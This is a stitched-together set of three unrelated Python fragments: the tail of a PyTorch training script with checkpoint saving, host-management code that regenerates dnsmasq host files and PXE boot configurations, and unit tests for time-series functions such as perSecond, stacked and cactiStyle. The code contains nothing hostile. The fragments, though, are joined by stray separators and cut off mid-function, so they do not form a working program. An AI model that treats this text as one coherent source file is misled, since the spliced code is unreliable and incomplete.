'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Prec@1 {top1.val:.3f} ({top1.avg:.3f})'.format(
i, len(val_loader), batch_time=batch_time, loss=losses,
top1=top1))
print(' * Prec@1 {top1.avg:.3f}'.format(top1=top1))
# log to TensorBoard
if args.tensorboard:
log_value('val_loss', losses.avg, epoch)
log_value('val_acc', top1.avg, epoch)
return top1.avg
def save_checkpoint(state, epoch):
"""Saves checkpoint to disk"""
directory = "checkpoints/{in_dataset}/{name}/".format(in_dataset=args.in_dataset, name=args.name)
if not os.path.exists(directory):
os.makedirs(directory)
filename = directory + 'checkpoint_{}.pth.tar'.format(epoch)
torch.save(state, filename)
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def adjust_learning_rate(optimizer, epoch, lr_schedule=[50, 75, 90]):
"""Sets the | |
mac_address = existing_host.mgmt_mac
else:
mac_address = None
line = self._dnsmasq_host_entry_to_string(address.address,
hostname,
mac_address)
f_out.write(line)
# Update host files atomically and reload dnsmasq
if (not os.path.isfile(dnsmasq_hosts_file) or
not filecmp.cmp(temp_dnsmasq_hosts_file, dnsmasq_hosts_file)):
os.rename(temp_dnsmasq_hosts_file, dnsmasq_hosts_file)
if (not os.path.isfile(dnsmasq_addn_hosts_file) or
not filecmp.cmp(temp_dnsmasq_addn_hosts_file,
dnsmasq_addn_hosts_file)):
os.rename(temp_dnsmasq_addn_hosts_file, dnsmasq_addn_hosts_file)
# If there is no distributed cloud addn_hosts file, create an empty one
# so dnsmasq will not complain.
dnsmasq_addn_hosts_dc_file = os.path.join(tsc.CONFIG_PATH, 'dnsmasq.addn_hosts_dc')
temp_dnsmasq_addn_hosts_dc_file = os.path.join(tsc.CONFIG_PATH, 'dnsmasq.addn_hosts_dc.temp')
if not os.path.isfile(dnsmasq_addn_hosts_dc_file):
with open(temp_dnsmasq_addn_hosts_dc_file, 'w') as f_out_addn_dc:
f_out_addn_dc.write(' ')
os.rename(temp_dnsmasq_addn_hosts_dc_file, dnsmasq_addn_hosts_dc_file)
os.system("pkill -HUP dnsmasq")
def _update_pxe_config(self, host, load=None):
"""Set up the PXE config file for this host so it can run
the installer.
This method must always be backward compatible with the previous
software release. During upgrades, this method is called when
locking/unlocking hosts running the previous release and when
downgrading a host. In both cases, it must be able to re-generate
the host's pxe config files appropriate to that host's software
version, using the pxeboot-update-<release>.sh script from the
previous release.
:param host: host object.
"""
sw_version = tsc.SW_VERSION
if load:
sw_version = load.software_version
else:
# No load provided, look it up...
host_upgrade = self.dbapi.host_upgrade_get_by_host(host.id)
target_load = self.dbapi.load_get(host_upgrade.target_load)
sw_version = target_load.software_version
if (host.personality == constants.CONTROLLER and
constants.WORKER in tsc.subfunctions):
if constants.LOWLATENCY in host.subfunctions:
pxe_config = "pxe-smallsystem_lowlatency-install-%s" % sw_version
else:
pxe_config = "pxe-smallsystem-install-%s" % sw_version
elif host.personality == constants.CONTROLLER:
pxe_config = "pxe-controller-install-%s" % sw_version
elif host.personality == constants.WORKER:
if constants.LOWLATENCY in host.subfunctions:
pxe_config = "pxe-worker_lowlatency-install-%s" % sw_version
else:
pxe_config = "pxe-worker-install-%s" % sw_version
elif host.personality == constants.STORAGE:
pxe_config = "pxe-storage-install-%s" % sw_version
# Defaults for configurable install parameters
install_opts = []
boot_device = host.get('boot_device') or "/dev/sda"
install_opts += ['-b', boot_device]
rootfs_device = host.get('rootfs_device') or "/dev/sda"
install_opts += ['-r', rootfs_device]
install_output = host.get('install_output') or "text"
if install_output == "text":
install_output_arg = "-t"
elif install_output == "graphical":
install_output_arg = "-g"
else:
LOG.warning("install_output set to invalid value (%s)"
% install_output)
install_output_arg = "-t"
install_opts += [install_output_arg]
# This version check MUST be present. The -u option does not exist
# prior to v17.00. This method is also called during upgrades to
# re-generate the host's pxe config files to the appropriate host's
# software version. It is required specifically when we downgrade a
# host or when we lock/unlock a host.
if sw_version != tsc.SW_VERSION_1610:
host_uuid = host.get('uuid')
notify_url = \
"http://pxecontroller:%d/v1/ihosts/%s/install_progress" % \
(CONF.sysinv_api_port, host_uuid)
install_opts += ['-u', notify_url]
system = self.dbapi.isystem_get_one()
# This version check MUST be present. The -s option
# (security profile) does not exist in 17.06 and below.
if sw_version != tsc.SW_VERSION_1706:
secprofile = system.security_profile
# ensure that the security profile selection is valid
if secprofile not in [constants.SYSTEM_SECURITY_PROFILE_STANDARD,
constants.SYSTEM_SECURITY_PROFILE_EXTENDED]:
LOG.error("Security Profile (%s) not a valid selection. "
"Defaulting to: %s" % (secprofile,
constants.SYSTEM_SECURITY_PROFILE_STANDARD))
secprofile = constants.SYSTEM_SECURITY_PROFILE_STANDARD
install_opts += ['-s', secprofile]
# If 'console' is not present in ihost_obj, we want to use the default.
# If, however, it is present and is explicitly set to None or "", then
# we don't specify the -c argument at all.
if 'console' not in host:
console = "ttyS0,115200"
else:
console = host.get('console')
if console is not None and console != "":
install_opts += ['-c', console]
# If 'tboot' is present in ihost_obj, retrieve and send the value
if 'tboot' in host:
tboot = host.get('tboot')
if tboot is not None and tboot != "":
install_opts += ['-T', tboot]
# This version check MUST be present. The -k option
# (extra_kernel_args) does not exist in 18.03 and below.
if sw_version != tsc.SW_VERSION_1706 and \
sw_version != tsc.SW_VERSION_1803:
install_opts += ['-k', system.security_feature]
base_url = "http://pxecontroller:%d" % cutils.get_http_port(self.dbapi)
install_opts += ['-l', base_url]
if host['mgmt_mac']:
dashed_mac = host["mgmt_mac"].replace(":", "-")
pxeboot_update = "/usr/sbin/pxeboot-update-%s.sh" % sw_version
# Remove an old file if it exists
try:
os.remove("/pxeboot/pxelinux.cfg/01-" + dashed_mac)
except OSError:
pass
try:
os.remove("/pxeboot/pxelinux.cfg/efi-01-" + dashed_mac)
except OSError:
pass
with open(os.devnull, "w") as fnull:
try:
subprocess.check_call(
[pxeboot_update, "-i", "/pxeboot/pxelinux.cfg.files/" +
pxe_config, "-o", "/pxeboot/pxelinux.cfg/01-" +
dashed_mac] + install_opts,
stdout=fnull,
stderr=fnull)
except subprocess.CalledProcessError:
raise exception.SysinvException(_(
"Failed to create pxelinux.cfg file"))
def _remove_pxe_config(self, host):
"""Delete the PXE config file for this host.
:param host: host object.
"""
if host.mgmt_mac:
dashed_mac = host.mgmt_mac.replace(":", "-")
# Remove the old file if it exists
try:
os.remove("/pxeboot/pxelinux.cfg/01-" + dashed_mac)
except OSError:
pass
try:
os.remove("/pxeboot/pxelinux.cfg/efi-01-" + dashed_mac)
except OSError:
pass
def _create_or_update_address(self, context, hostname, ip_address,
iface_type, iface_id=None):
if hostname is None or ip_address is None:
return
address_name = cutils.format_address_name(hostname, iface_type)
address_family = IPNetwork(ip_address).version
try:
address = self.dbapi.address_get_by_address(ip_address)
address_uuid = address['uuid']
# If name is already set, return
if (self.dbapi.address_get_by_name(address_name) ==
address_uuid and iface_id is None):
return
except exception.AddressNotFoundByAddress:
address_uuid = None
except exception.AddressNotFoundByName:
pass
network = self.dbapi.network_get_by_type(iface_type)
address_pool_uuid = network.pool_uuid
address_pool = self.dbapi.address_pool_get(address_pool_uuid)
values = {
'name': address_name,
'family': address_family,
'prefix': address_pool.prefix,
'address': ip_address,
'address_pool_id': address_pool.id,
}
if iface_id:
values['interface_id'] = iface_id
if address_uuid:
address = self.dbapi.address_update(address_uuid, values)
else:
address = self.dbapi.address_create(values)
self._generate_dnsmasq_hosts_file()
return address
def _allocate_pool_address(self, interface_id, pool_uuid, address_name):
return address_pool.AddressPoolController.assign_address(
interface_id, pool_uuid, address_name, dbapi=self.dbapi
)
def _allocate_addresses_for_host(self, context, host):
"""Allocates addresses for a given host.
Does the following tasks:
- Check if addresses exist for host
- Allocate addresses for host from pools
- Update ihost with mgmt address
- Regenerate the dnsmasq hosts file
:param context: request context
:param host: host object
"""
mgmt_ip = host.mgmt_ip
mgmt_interfaces = self.iinterfaces_get_by_ihost_nettype(
context, host.uuid, constants.NETWORK_TYPE_MGMT
)
mgmt_interface_id = None
if mgmt_interfaces:
mgmt_interface_id = mgmt_interfaces[0]['id']
hostname = host.hostname
address_name = cutils.format_address_name(hostname,
constants.NETWORK_TYPE_MGMT)
# if ihost has mgmt_ip, make sure address in address table
if mgmt_ip:
self._create_or_update_address(context, hostname, mgmt_ip,
constants.NETWORK_TYPE_MGMT,
mgmt_interface_id)
# if ihost has no management IP, check for static mgmt IP
if not mgmt_ip:
mgmt_ip = self._lookup_static_ip_address(
hostname, constants.NETWORK_TYPE_MGMT
)
if mgmt_ip:
host.mgmt_ip = mgmt_ip
self.update_ihost(context, host)
# if no static address, then allocate one
if not mgmt_ip:
mgmt_pool = self.dbapi.network_get_by_type(
constants.NETWORK_TYPE_MGMT
).pool_uuid
mgmt_ip = self._allocate_pool_address(mgmt_interface_id, mgmt_pool,
address_name).address
if mgmt_ip:
host.mgmt_ip = mgmt_ip
self.update_ihost(context, host)
self._generate_dnsmasq_hosts_file(existing_host=host)
def get_my_host_id(self):
if not ConductorManager.my_host_id:
local_hostname = socket.gethostname()
controller = self.dbapi.ihost_get(local_hostname)
ConductorManager.my_host_id = controller['id']
return ConductorManager.my_host_id
def get_dhcp_server_duid(self):
"""Retrieves the server DUID from the local DHCP server lease file."""
lease_filename = tsc.CONFIG_PATH + 'dnsmasq.leases'
with open(lease_filename, 'r') as lease_file:
for columns in (line.strip().split() for line in lease_file):
if len(columns) != 2:
continue
keyword, value = columns
if keyword.lower() == "duid":
return value
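# Example of the lease-file record this parser looks for (value is illustrative;
# the assumption is that dnsmasq writes a two-column "duid <value>" line when
# DHCPv6 is in use):
#   duid 00:01:00:01:27:79:7d:3d:08:00:27:ae:2f:51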
def _dhcp_release(self, interface, ip_address, mac_address, cid=None):
"""Release a given DHCP lease"""
params = [interface, ip_address, mac_address]
if cid:
params += [cid]
if IPAddress(ip_address).version == 6:
params = ["--ip", ip_address,
"--iface", interface,
"--server-id", self.get_dhcp_server_duid(),
"--client-id", cid,
"--iaid", str(cutils.get_dhcp_client_iaid(mac_address))]
LOG.warning("Invoking dhcp_release6 for {}".format(params))
subprocess.call(["dhcp_release6"] + params)
else:
LOG.warning("Invoking dhcp_release for {}".format(params))
subprocess.call(["dhcp_release"] + params)
def _find_networktype_for_address(self, ip_address):
for network in self.dbapi.networks_get_all():
pool = self.dbapi.address_pool_get(network.pool_uuid)
subnet = IPNetwork(pool.network + '/' + str(pool.prefix))
address = IPAddress(ip_address)
if address in subnet:
return network.type
def _find_local_interface_name(self, network_type):
"""Lookup the local interface name for a given network type."""
host_id = self.get_my_host_id()
interface_list = self.dbapi.iinterface_get_all(host_id, expunge=True)
ifaces = dict((i['ifname'], i) for i in interface_list)
port_list = self.dbapi.port_get_all(host_id)
ports = dict((p['interface_id'], p) for p in port_list)
for interface in interface_list:
if network_type in interface.networktypelist:
return cutils.get_interface_os_ifname(interface, ifaces, ports)
def _find_local_mgmt_interface_vlan_id(self):
"""Lookup the local interface name for a given network type."""
host_id = self.get_my_host_id()
interface_list = self.dbapi.iinterface_get_all(host_id, expunge=True)
for interface in interface_list:
if constants.NETWORK_TYPE_MGMT in interface.networktypelist:
if 'vlan_id' not in interface:
return 0
else:
return interface['vlan_id']
def _remove_leases_by_mac_address(self, mac_address):
"""Remove any leases that were added without a CID that we were not
able to delete. This is specifically looking for leases on the pxeboot
network that may still be present but will also handle the unlikely
event of deleting an old host during an upgrade. Hosts on previous
releases did not register a CID on the mgmt interface."""
lease_filename = tsc.CONFIG_PATH + 'dnsmasq.leases'
try:
with open(lease_filename, 'r') as lease_file:
for columns in (line.strip().split() for line in lease_file):
if len(columns) != 5:
continue
timestamp, address, ip_address, hostname, cid = columns
if address != mac_address:
continue
network_type = self._find_networktype_for_address(ip_address)
if not network_type:
# Not one | |
functions.perSecond({}, seriesList)
self.assertEqual(expected, result, 'perSecond result incorrect')
def test_perSecond_nones(self):
seriesList = [TimeSeries('test', 0, 600, 60, [0, 60, None, 180, None, 300, None, 420, None, 540])]
expected = [TimeSeries('perSecond(test)', 0, 600, 60, [None, 1, None, 1, None, 1, None, 1, None, 1])]
result = functions.perSecond({}, seriesList)
self.assertEqual(expected, result, 'perSecond result incorrect')
def test_perSecond_max(self):
seriesList = [TimeSeries('test', 0, 600, 60, [0, 120, 240, 480, 960, 900, 120, 240, 120, 0])]
expected = [TimeSeries('perSecond(test)', 0, 600, 60, [None, 2, 2, 4, 8, None, -5, 2, 6, 6])]
result = functions.perSecond({}, seriesList, 480)
self.assertEqual(expected, result, 'perSecond result incorrect')
def test_integral(self):
seriesList = [TimeSeries('test', 0, 600, 60, [None, 1, 2, 3, 4, 5, None, 6, 7, 8])]
expected = [TimeSeries('integral(test)', 0, 600, 60, [None, 1, 3, 6, 10, 15, None, 21, 28, 36])]
result = functions.integral({}, seriesList)
self.assertEqual(expected, result, 'integral result incorrect')
def test_integralByInterval(self):
seriesList = [TimeSeries('test', 0, 600, 60, [None, 1, 2, 3, 4, 5, None, 6, 7, 8])]
expected = [TimeSeries("integralByInterval(test,'2min')", 0, 600, 60, [0, 1, 2, 5, 4, 9, 0, 6, 7, 15])]
result = functions.integralByInterval({'startTime' : datetime(1970,1,1)}, seriesList, '2min')
self.assertEqual(expected, result, 'integralByInterval result incorrect %s %s' %(result, expected))
def test_stacked(self):
seriesList = [
TimeSeries('collectd.test-db1.load.value',0,600,60,[1,2,3,4,5,6,7,8,9,10]),
TimeSeries('collectd.test-db2.load.value',0,600,60,[None,2,None,4,None,6,None,8,None,10]),
TimeSeries('collectd.test-db3.load.value',0,600,60,[1,2,None,None,None,6,7,8,9,10]),
TimeSeries('collectd.test-db4.load.value',0,600,60,[1,2,3,4,5,6,7,8,9,None]),
]
for series in seriesList:
series.pathExpression = series.name
expectedResult = [
TimeSeries('stacked(collectd.test-db1.load.value)',0,600,60,[1,2,3,4,5,6,7,8,9,10]),
TimeSeries('stacked(collectd.test-db2.load.value)',0,600,60,[None,4,None,8,None,12,None,16,None,20]),
TimeSeries('stacked(collectd.test-db3.load.value)',0,600,60,[2,6,None,None,None,18,14,24,18,30]),
TimeSeries('stacked(collectd.test-db4.load.value)',0,600,60,[3,8,6,12,10,24,21,32,27,None]),
]
for series in expectedResult:
series.options = {'stacked': True}
request_context = {}
result = functions.stacked(request_context, seriesList)
self.assertEqual(result, expectedResult)
self.assertEqual(request_context, {'totalStack': {'__DEFAULT__': [3,8,6,12,10,24,21,32,27,30]}})
def test_stacked_with_name(self):
seriesList = [
TimeSeries('collectd.test-db1.load.value',0,600,60,[1,2,3,4,5,6,7,8,9,10]),
TimeSeries('collectd.test-db2.load.value',0,600,60,[None,2,None,4,None,6,None,8,None,10]),
TimeSeries('collectd.test-db3.load.value',0,600,60,[1,2,None,None,None,6,7,8,9,10]),
TimeSeries('collectd.test-db4.load.value',0,600,60,[1,2,3,4,5,6,7,8,9,None]),
]
for series in seriesList:
series.pathExpression = series.name
expectedResult = [
TimeSeries('collectd.test-db1.load.value',0,600,60,[1,2,3,4,5,6,7,8,9,10]),
TimeSeries('collectd.test-db2.load.value',0,600,60,[None,4,None,8,None,12,None,16,None,20]),
TimeSeries('collectd.test-db3.load.value',0,600,60,[2,6,None,None,None,18,14,24,18,30]),
TimeSeries('collectd.test-db4.load.value',0,600,60,[3,8,6,12,10,24,21,32,27,None]),
]
for series in expectedResult:
series.options = {'stacked': True}
request_context = {'totalStack': {'my_fun_stack': [0,0,0,0,0,0,0,0,0,0]}}
result = functions.stacked(request_context, seriesList, 'my_fun_stack')
self.assertEqual(result, expectedResult)
self.assertEqual(request_context, {'totalStack': {'my_fun_stack': [3,8,6,12,10,24,21,32,27,30]}})
def test_areaBetween(self):
seriesList = [
TimeSeries('collectd.test-db1.load.value',0,600,60,[1,2,3,4,5,6,7,8,9,10]),
TimeSeries('collectd.test-db2.load.value',0,600,60,[1,2,3,4,5,6,7,8,9,10]),
]
for series in seriesList:
series.pathExpression = series.name
expectedResult = [
TimeSeries('areaBetween(collectd.test-db2.load.value)',0,600,60,[1,2,3,4,5,6,7,8,9,10]),
TimeSeries('areaBetween(collectd.test-db2.load.value)',0,600,60,[1,2,3,4,5,6,7,8,9,10]),
]
expectedResult[0].options = {'stacked': True, 'invisible': True}
expectedResult[1].options = {'stacked': True}
request_context = {}
result = functions.areaBetween(request_context, seriesList)
self.assertEqual(result, expectedResult)
def test_cactiStyle(self):
seriesList = [
TimeSeries('collectd.test-db1.load.value',0,600,60,[1,2,3,4,5,6,7,8,9,10]),
TimeSeries('collectd.test-db2.load.value',0,600,60,[None,None,None,None,None,None,None,None,None,None]),
TimeSeries('collectd.test-db3.load.value',0,600,60,[1,2,None,None,None,6,7,8,9,10]),
TimeSeries('collectd.test-db4.load.value',0,600,60,[1,2,3,4,5,6,7,8,9,None]),
]
for series in seriesList:
series.pathExpression = series.name
expectedResult = [
TimeSeries('collectd.test-db1.load.value Current:10.00 Max:10.00 Min:1.00 ',0,600,60,[1,2,3,4,5,6,7,8,9,10]),
TimeSeries('collectd.test-db2.load.value Current:nan Max:nan Min:nan ',0,600,60,[None,None,None,None,None,None,None,None,None,None]),
TimeSeries('collectd.test-db3.load.value Current:10.00 Max:10.00 Min:1.00 ',0,600,60,[1,2,None,None,None,6,7,8,9,10]),
TimeSeries('collectd.test-db4.load.value Current:9.00 Max:9.00 Min:1.00 ',0,600,60,[1,2,3,4,5,6,7,8,9,None]),
]
for series in expectedResult:
series.options = {}
request_context = {}
result = functions.cactiStyle(request_context, seriesList)
self.assertEqual(result, expectedResult)
def test_cactiStyle_units(self):
seriesList = [
TimeSeries('collectd.test-db1.load.value',0,600,60,[1,2,3,4,5,6,7,8,9,10]),
TimeSeries('collectd.test-db2.load.value',0,600,60,[None,None,None,None,None,None,None,None,None,None]),
TimeSeries('collectd.test-db3.load.value',0,600,60,[1,2,None,None,None,6,7,8,9,10]),
TimeSeries('collectd.test-db4.load.value',0,600,60,[1,2,3,4,5,6,7,8,9,None]),
]
for series in seriesList:
series.pathExpression = series.name
expectedResult = [
TimeSeries('collectd.test-db1.load.value Current:10.00 b Max:10.00 b Min:1.00 b ',0,600,60,[1,2,3,4,5,6,7,8,9,10]),
TimeSeries('collectd.test-db2.load.value Current:nan Max:nan Min:nan ',0,600,60,[None,None,None,None,None,None,None,None,None,None]),
TimeSeries('collectd.test-db3.load.value Current:10.00 b Max:10.00 b Min:1.00 b ',0,600,60,[1,2,None,None,None,6,7,8,9,10]),
TimeSeries('collectd.test-db4.load.value Current:9.00 b Max:9.00 b Min:1.00 b ',0,600,60,[1,2,3,4,5,6,7,8,9,None]),
]
for series in expectedResult:
series.options = {}
request_context = {}
result = functions.cactiStyle(request_context, seriesList, units="b")
self.assertEqual(result, expectedResult)
def test_cactiStyle_emptyList(self):
result = functions.cactiStyle({}, [])
self.assertEqual(result, [])
def test_cactiStyle_binary(self):
seriesList = [
TimeSeries('collectd.test-db1.load.value',0,600,60,[1,2,3,4,5,6,7,8,9,10]),
TimeSeries('collectd.test-db2.load.value',0,600,60,[None,None,None,None,None,None,None,None,None,None]),
TimeSeries('collectd.test-db3.load.value',0,600,60,[1,2,None,None,None,6,7,8,9,10]),
TimeSeries('collectd.test-db4.load.value',0,600,60,[1,2,3,4,5,6,7,8,9,None]),
]
for series in seriesList:
series.pathExpression = series.name
expectedResult = [
TimeSeries('collectd.test-db1.load.value Current:10.00 Max:10.00 Min:1.00 ',0,600,60,[1,2,3,4,5,6,7,8,9,10]),
TimeSeries('collectd.test-db2.load.value Current:nan Max:nan Min:nan ',0,600,60,[None,None,None,None,None,None,None,None,None,None]),
TimeSeries('collectd.test-db3.load.value Current:10.00 Max:10.00 Min:1.00 ',0,600,60,[1,2,None,None,None,6,7,8,9,10]),
TimeSeries('collectd.test-db4.load.value Current:9.00 Max:9.00 Min:1.00 ',0,600,60,[1,2,3,4,5,6,7,8,9,None]),
]
for series in expectedResult:
series.options = {}
request_context = {}
result = functions.cactiStyle(request_context, seriesList, "binary")
self.assertEqual(result, expectedResult)
def test_cactiStyle_binary_units(self):
seriesList = [
TimeSeries('collectd.test-db1.load.value',0,600,60,[1,2,3,4,5,6,7,8,9,10]),
TimeSeries('collectd.test-db2.load.value',0,600,60,[None,None,None,None,None,None,None,None,None,None]),
TimeSeries('collectd.test-db3.load.value',0,600,60,[1,2,None,None,None,6,7,8,9,10]),
TimeSeries('collectd.test-db4.load.value',0,600,60,[1,2,3,4,5,6,7,8,9,None]),
]
for series in seriesList:
series.pathExpression = series.name
expectedResult = [
TimeSeries('collectd.test-db1.load.value Current:10.00 b Max:10.00 b Min:1.00 b ',0,600,60,[1,2,3,4,5,6,7,8,9,10]),
TimeSeries('collectd.test-db2.load.value Current:nan Max:nan Min:nan ',0,600,60,[None,None,None,None,None,None,None,None,None,None]),
TimeSeries('collectd.test-db3.load.value Current:10.00 b Max:10.00 b Min:1.00 b ',0,600,60,[1,2,None,None,None,6,7,8,9,10]),
TimeSeries('collectd.test-db4.load.value Current:9.00 b Max:9.00 b Min:1.00 b ',0,600,60,[1,2,3,4,5,6,7,8,9,None]),
]
for series in expectedResult:
series.options = {}
request_context = {}
result = functions.cactiStyle(request_context, seriesList, "binary", "b")
self.assertEqual(result, expectedResult)
def test_n_percentile(self):
config = [
[15, 35, 20, 40, 50],
range(1, 101),
range(1, 201),
range(1, 301),
range(0, 100),
range(0, 200),
range(0, 300),
# Ensure None values in the list have no effect.
[None, None, None] + range(0, 300),
]
def n_percentile(perc, expect):
seriesList = []
expected = []
for i, c in enumerate(config):
seriesList.append(TimeSeries('Test(%d)' % i, 0, len(c), 1, c))
expected.append(TimeSeries('nPercentile(Test(%d), %d)' % (i, perc), 0, len(c), 1, expect[i]*len(c)))
result = functions.nPercentile({}, seriesList, perc)
self.assertEqual(expected, result)
n_percentile(30, [[20], [31], [61], [91], [30], [60], [90], [90]])
n_percentile(90, [[50], [91], [181], [271], [90], [180], [270], [270]])
n_percentile(95, [[50], [96], [191], [286], [95], [190], [285], [285]])
def test_averageOutsidePercentile_30(self):
seriesList = [
TimeSeries('collectd.test-db1.load.value',0,100,1,[7]*100),
TimeSeries('collectd.test-db2.load.value',0,100,1,[5]*100),
TimeSeries('collectd.test-db3.load.value',0,100,1,[10]*100),
TimeSeries('collectd.test-db4.load.value',0,100,1,[1]*100),
]
expectedResult = [
TimeSeries('collectd.test-db2.load.value',0,100,1,[5]*100),
TimeSeries('collectd.test-db3.load.value',0,100,1,[10]*100),
TimeSeries('collectd.test-db4.load.value',0,100,1,[1]*100),
]
result = functions.averageOutsidePercentile({}, seriesList, 30)
self.assertEqual(result, expectedResult)
def test_averageOutsidePercentile_70(self):
seriesList = [
TimeSeries('collectd.test-db1.load.value',0,100,1,[7]*100),
TimeSeries('collectd.test-db2.load.value',0,100,1,[5]*100),
TimeSeries('collectd.test-db3.load.value',0,100,1,[10]*100),
TimeSeries('collectd.test-db4.load.value',0,100,1,[1]*100),
]
expectedResult = [
TimeSeries('collectd.test-db2.load.value',0,100,1,[5]*100),
TimeSeries('collectd.test-db3.load.value',0,100,1,[10]*100),
TimeSeries('collectd.test-db4.load.value',0,100,1,[1]*100),
]
result = functions.averageOutsidePercentile({}, seriesList, 70)
self.assertEqual(result, expectedResult)
def test_removeBetweenPercentile_30(self):
seriesList = [
TimeSeries('collectd.test-db1.load.value',0,100,1,[7]*100),
TimeSeries('collectd.test-db2.load.value',0,100,1,[5]*100),
TimeSeries('collectd.test-db3.load.value',0,100,1,[10]*100),
TimeSeries('collectd.test-db4.load.value',0,100,1,[1]*100),
]
expectedResult = [
TimeSeries('collectd.test-db2.load.value',0,100,1,[5]*100),
TimeSeries('collectd.test-db3.load.value',0,100,1,[10]*100),
TimeSeries('collectd.test-db4.load.value',0,100,1,[1]*100),
]
result = functions.removeBetweenPercentile({}, seriesList, 30)
self.assertEqual(result, expectedResult)
def test_removeBetweenPercentile_70(self):
seriesList = [
TimeSeries('collectd.test-db1.load.value',0,100,1,[7]*100),
TimeSeries('collectd.test-db2.load.value',0,100,1,[5]*100),
TimeSeries('collectd.test-db3.load.value',0,100,1,[10]*100),
TimeSeries('collectd.test-db4.load.value',0,100,1,[1]*100),
]
expectedResult = [
TimeSeries('collectd.test-db2.load.value',0,100,1,[5]*100),
TimeSeries('collectd.test-db3.load.value',0,100,1,[10]*100),
TimeSeries('collectd.test-db4.load.value',0,100,1,[1]*100),
]
result = functions.removeBetweenPercentile({}, seriesList, 70)
self.assertEqual(result, expectedResult)
def test_sortByName(self):
seriesList = [
TimeSeries('collectd.test-db3.load.value',0,100,1,[10]*100),
TimeSeries('collectd.test-db2.load.value',0,100,1,[5]*100),
TimeSeries('collectd.test-db4.load.value',0,100,1,[1]*100),
TimeSeries('collectd.test-db1.load.value',0,100,1,[7]*100),
]
expectedResult = [
TimeSeries('collectd.test-db1.load.value',0,100,1,[7]*100),
TimeSeries('collectd.test-db2.load.value',0,100,1,[5]*100),
TimeSeries('collectd.test-db3.load.value',0,100,1,[10]*100),
TimeSeries('collectd.test-db4.load.value',0,100,1,[1]*100),
]
result = functions.sortByName({}, seriesList)
self.assertEqual(result, expectedResult)
def test_sortByName_natural(self):
seriesList = [
TimeSeries('collectd.test-db3.load.value',0,100,1,[10]*100),
TimeSeries('collectd.test-db2.load.value',0,100,1,[5]*100),
TimeSeries('collectd.test-db4.load.value',0,100,1,[1]*100),
TimeSeries('collectd.test-db1.load.value',0,100,1,[7]*100),
]
expectedResult = [
TimeSeries('collectd.test-db1.load.value',0,100,1,[7]*100),
TimeSeries('collectd.test-db2.load.value',0,100,1,[5]*100),
TimeSeries('collectd.test-db3.load.value',0,100,1,[10]*100),
TimeSeries('collectd.test-db4.load.value',0,100,1,[1]*100),
]
result = functions.sortByName({}, seriesList, True)
self.assertEqual(result, expectedResult)
def test_sorting_by_total(self):
seriesList = []
config = [[1000, 100, 10, 0], [1000, 100, 10, 1]]
for i, c in enumerate(config):
seriesList.append(TimeSeries('Test(%d)' % i, 0, 0, 0, c))
self.assertEqual(1110, functions.safeSum(seriesList[0]))
result = functions.sortByTotal({}, seriesList)
self.assertEqual(1111, functions.safeSum(result[0]))
self.assertEqual(1110, functions.safeSum(result[1]))
def test_sortByMaxima(self):
seriesList = [
TimeSeries('collectd.test-db3.load.value',0,100,1,[10]*100),
TimeSeries('collectd.test-db2.load.value',0,100,1,[5]*100),
TimeSeries('collectd.test-db4.load.value',0,100,1,[1]*100),
TimeSeries('collectd.test-db1.load.value',0,100,1,[7]*100),
]
expectedResult = [
TimeSeries('collectd.test-db3.load.value',0,100,1,[10]*100),
TimeSeries('collectd.test-db1.load.value',0,100,1,[7]*100),
TimeSeries('collectd.test-db2.load.value',0,100,1,[5]*100),
TimeSeries('collectd.test-db4.load.value',0,100,1,[1]*100),
]
result = functions.sortByMaxima({}, seriesList)
self.assertEqual(result, expectedResult)
def test_sortByMinima(self):
seriesList = [
TimeSeries('collectd.test-db3.load.value',0,100,1,[10]*100),
TimeSeries('collectd.test-db2.load.value',0,100,1,[5]*100),
TimeSeries('collectd.test-db4.load.value',0,100,1,[1]*100),
TimeSeries('collectd.test-db1.load.value',0,100,1,[7]*100),
]
expectedResult = [
TimeSeries('collectd.test-db4.load.value',0,100,1,[1]*100),
TimeSeries('collectd.test-db2.load.value',0,100,1,[5]*100),
TimeSeries('collectd.test-db1.load.value',0,100,1,[7]*100),
TimeSeries('collectd.test-db3.load.value',0,100,1,[10]*100),
]
result = functions.sortByMinima({}, seriesList)
self.assertEqual(result, expectedResult)
def _generate_series_list(self):
seriesList = []
config = [range(101), range(101), [1, None, None, None, None]]
for i, c in enumerate(config):
name = "collectd.test-db{0}.load.value".format(i + 1)
seriesList.append(TimeSeries(name, 0, len(c), 1, c))
for series in seriesList:
series.pathExpression = series.name
return seriesList
def test_check_empty_lists(self):
seriesList = []
config = [[1000, 100, 10, 0], []]
for i, c in enumerate(config):
seriesList.append(TimeSeries('Test(%d)' % i, 0, 0, 0, c))
self.assertTrue(functions.safeIsNotEmpty(seriesList[0]))
self.assertFalse(functions.safeIsNotEmpty(seriesList[1]))
result = functions.removeEmptySeries({}, seriesList)
self.assertEqual(1, len(result))
def test_remove_above_percentile(self):
seriesList = self._generate_series_list()
percent = 50
results = functions.removeAbovePercentile({}, seriesList, percent)
for i, result in enumerate(results):
self.assertEqual(return_greater(result, percent), [])
expected_name = "removeAbovePercentile(collectd.test-db{0}.load.value, 50)".format(i + 1)
self.assertEqual(expected_name, result.name)
def test_remove_above_percentile_float(self):
seriesList = self._generate_series_list()
percent = 0.1
results = functions.removeAbovePercentile({}, seriesList, percent)
expected = [[], [], [1]]
for i, result in enumerate(results):
self.assertEqual(return_greater(result, percent), expected[i])
expected_name = "removeAbovePercentile(collectd.test-db{0}.load.value, 0.1)".format(i + 1)
self.assertEqual(expected_name, result.name)
def test_remove_below_percentile(self):
seriesList = self._generate_series_list()
percent = 50
results = functions.removeBelowPercentile({}, seriesList, percent)
expected = [[], [], [1]]
for i, result in enumerate(results):
self.assertEqual(return_less(result, percent), expected[i])
expected_name = "removeBelowPercentile(collectd.test-db{0}.load.value, 50)".format(i + 1)
self.assertEqual(expected_name, result.name)
def test_remove_below_percentile_float(self):
seriesList = self._generate_series_list()
percent = 0.1
results = functions.removeBelowPercentile({}, seriesList, percent)
expected = [[0], [0], []]
for i, result in enumerate(results):
self.assertEqual(return_less(result, percent), expected[i])
expected_name = "removeBelowPercentile(collectd.test-db{0}.load.value, 0.1)".format(i + 1)
self.assertEqual(expected_name, result.name)
def test_remove_above_value(self):
